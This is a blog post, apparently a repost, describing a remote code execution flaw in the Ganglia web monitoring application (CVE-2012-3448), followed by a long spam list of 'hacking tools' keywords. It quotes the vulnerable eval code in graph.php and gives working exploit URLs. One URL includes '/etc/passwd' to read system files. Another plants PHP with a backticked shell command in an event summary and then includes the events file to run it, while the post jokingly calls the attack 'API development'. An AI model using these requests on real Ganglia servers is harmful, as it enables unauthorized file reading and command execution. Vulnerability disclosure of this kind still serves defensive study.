http://console-cowboys.blogspot.com/2012/01/ganglia-monitoring-system-lfi.html
I recently grabbed the latest version of the Ganglia web application to take a look to see if this issue has been fixed and I was pleasantly surprised... github is over here -
https://github.com/ganglia/ganglia-web
Looking at the code the following (abbreviated "graph.php") sequence can be found -
$graph = isset($_GET["g"]) ? sanitize ( $_GET["g"] ) : "metric";
....
$graph_arguments = NULL;
$pos = strpos($graph, ",");
$graph_arguments = substr($graph, $pos + 1);
....
eval('$graph_function($rrdtool_graph,' . $graph_arguments . ');');
I can only guess that this previous snippet of code was meant to be used as some sort of API put in place for remote developers, unfortunately it is slightly broken. For some reason when this API was being developed part of its interface was wrapped in the following function -
function sanitize ( $string ) {
return escapeshellcmd( clean_string( rawurldecode( $string ) ) ) ;
}
According the the PHP documentation -
Following characters are preceded by a backslash: #&;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only if they are not paired. In Windows, all these characters plus % are replaced by a space instead.
This limitation of the API means we cannot simply pass in a function like eval, exec, system, or use backticks to create our Ganglia extension. Our only option is to use PHP functions that do not require "(" or ")" a quick look at the available options (http://www.php.net/manual/en/reserved.keywords.php) it looks like "include" would work nicely. An example API request that would help with administrative reporting follows:
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/etc/passwd'
Very helpful, we can get a nice report with a list of current system users. Reporting like this is a nice feature but what we really would like to do is create a new extension that allows us to execute system commands on the Ganglia system. After a brief examination of the application it was found that we can leverage some other functionality of the application to finalize our Ganglia extension. The "events" page allows for a Ganglia user to configure events in the system, I am not exactly sure what type of events you would configure, but I hope that I am invited.
As you can see in the screen shot I have marked the "Event Summary" with "php here". When creating our API extension event we will fill in this event with the command we wish to run, see the following example request -
http://192.168.18.157/gang/api/events.php?action=add&summary=<%3fphp+echo+`whoami`%3b+%3f>&start_time=07/01/2012%2000:00%20&end_time=07/02/2012%2000:00%20&host_regex=
This request will set up an "event" that will let everyone know who you are, that would be the friendly thing to do when attending an event. We can now go ahead and wire up our API call to attend our newly created event. Since we know that Ganglia keeps track of all planned events in the following location "/var/lib/ganglia/conf/events.json" lets go ahead and include this file in our API call -
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/var/lib/ganglia/conf/events.json'
As you can see we have successfully made our API call and let everyone know at the "event" that our name is "www-data". From here I will leave the rest of the API development up to you. I hope this article will get you started on your Ganglia API development and you are able to implement whatever functionality your environment requires. Thanks for following along.
Update: This issue has been assigned CVE-2012-3448
Read more
- Hacking Tools Github
- New Hacker Tools
- How To Make Hacking Tools
- Hacking Tools Name
- Hack Tools For Pc
- Hack Tools Mac
- Hack Tools For Mac
- Hacker Tools Software
- Pentest Tools For Windows
- Pentest Tools
- Underground Hacker Sites
- Pentest Reporting Tools
- Hacker Tools Windows
- Growth Hacker Tools
- How To Make Hacking Tools
- New Hacker Tools
- Hacker Tools 2020
- Game Hacking
- Hack Tools Mac
- Pentest Reporting Tools
- Physical Pentest Tools
- Github Hacking Tools
- Hacker Tools Mac
- Growth Hacker Tools
- Hack Tools
- Hacker Tools 2019
- Pentest Tools Online
- Hacking Tools 2020
- Wifi Hacker Tools For Windows
- Pentest Tools List
- Nsa Hacker Tools
- Black Hat Hacker Tools
- Hacking Tools For Kali Linux
- Pentest Tools Free
- Hacker Tool Kit
- Nsa Hacker Tools
- Pentest Tools For Ubuntu
- Hacking Tools Windows 10
- Pentest Recon Tools
- Hacker Tools Linux
- Hacking Tools Windows 10
- Hacker Tools
- Hack Website Online Tool
- Hacking Tools Download
- Hack Tools
- Hacker Tools Windows
- Hacking Tools For Windows 7
- Hacking Tools Usb
- Pentest Tools Apk
- Beginner Hacker Tools
- Tools 4 Hack
- Physical Pentest Tools
- How To Hack
- Hack Tools Online
- Hack Tools 2019
- Beginner Hacker Tools
- Hacking Tools For Windows Free Download
- Hacker Tools Windows
- Hacking Tools And Software
- Hacker Tools Online
- Hack Tools Download
- Hack Rom Tools
- Hacking Tools Hardware
- Tools 4 Hack
- Usb Pentest Tools
- Hacker Tools Apk Download
- Hacking Tools 2019
- Hack Tool Apk
- Pentest Tools Url Fuzzer
- Hacking Tools For Pc
- Pentest Tools Linux
- Hacking Tools Mac
- Hacking Tools
- Hack Tools For Windows
- Pentest Tools Find Subdomains
- Hacking Tools Usb
- Hacking Tools Online
- Pentest Tools Kali Linux
- Hacking Tools Kit
- Hacker Tools Github
- Pentest Tools Github
- Computer Hacker
- Hack Tools For Mac
- Hack Tools 2019
- Tools 4 Hack
- Free Pentest Tools For Windows
- Hacking Tools Mac
- Hack Tool Apk No Root
- Blackhat Hacker Tools
- Hack Website Online Tool
- Blackhat Hacker Tools
- Tools Used For Hacking
- Hacker Tools Hardware
- Hacking Tools Software
- Bluetooth Hacking Tools Kali
- Hacking Tools Free Download
- Hacker Search Tools
- Physical Pentest Tools
- Top Pentest Tools
- Hack Tool Apk No Root
- Pentest Tools Website
- Usb Pentest Tools
- Hacker Tools
- Hack Tools
- Pentest Tools Subdomain
- Pentest Tools Find Subdomains
- Hacking Tools Download
- Hack Tools
- Hacking Tools 2020
- Termux Hacking Tools 2019
- Pentest Tools Open Source
- Hacker Tools
- Hacking Tools 2020
- Hack Tools 2019
- Hacking Tools For Windows Free Download
- Hacker
- Hacker Tools
- Hacking Tools For Windows Free Download
- Github Hacking Tools
- Hacking Tools For Pc
- Pentest Tools Review
- Kik Hack Tools
- Hacker Tools 2020
- Hack Tools For Mac
- Pentest Tools Free
- Hacker Tools
- Pentest Tools Alternative
- Pentest Reporting Tools
- Hacking Tools For Windows 7
- Hack Tools For Windows
- Hacker Tools For Pc
- Hacking Tools 2019
- Hacker Tools Apk Download
- Github Hacking Tools
- Bluetooth Hacking Tools Kali
- Tools For Hacker
- Hacker Tools Apk Download
- Easy Hack Tools
- Hacking Tools And Software
- Hack Tools For Games
- Hacking Tools
- Pentest Tools Online
- Hacking Tools Windows
- Hacker Tools List
- Hack Tools Pc
- Hacking Tools For Beginners
- How To Hack
- Pentest Tools Apk
- Hack Website Online Tool
- Hacker Tools Hardware
- Easy Hack Tools
No comments:
Post a Comment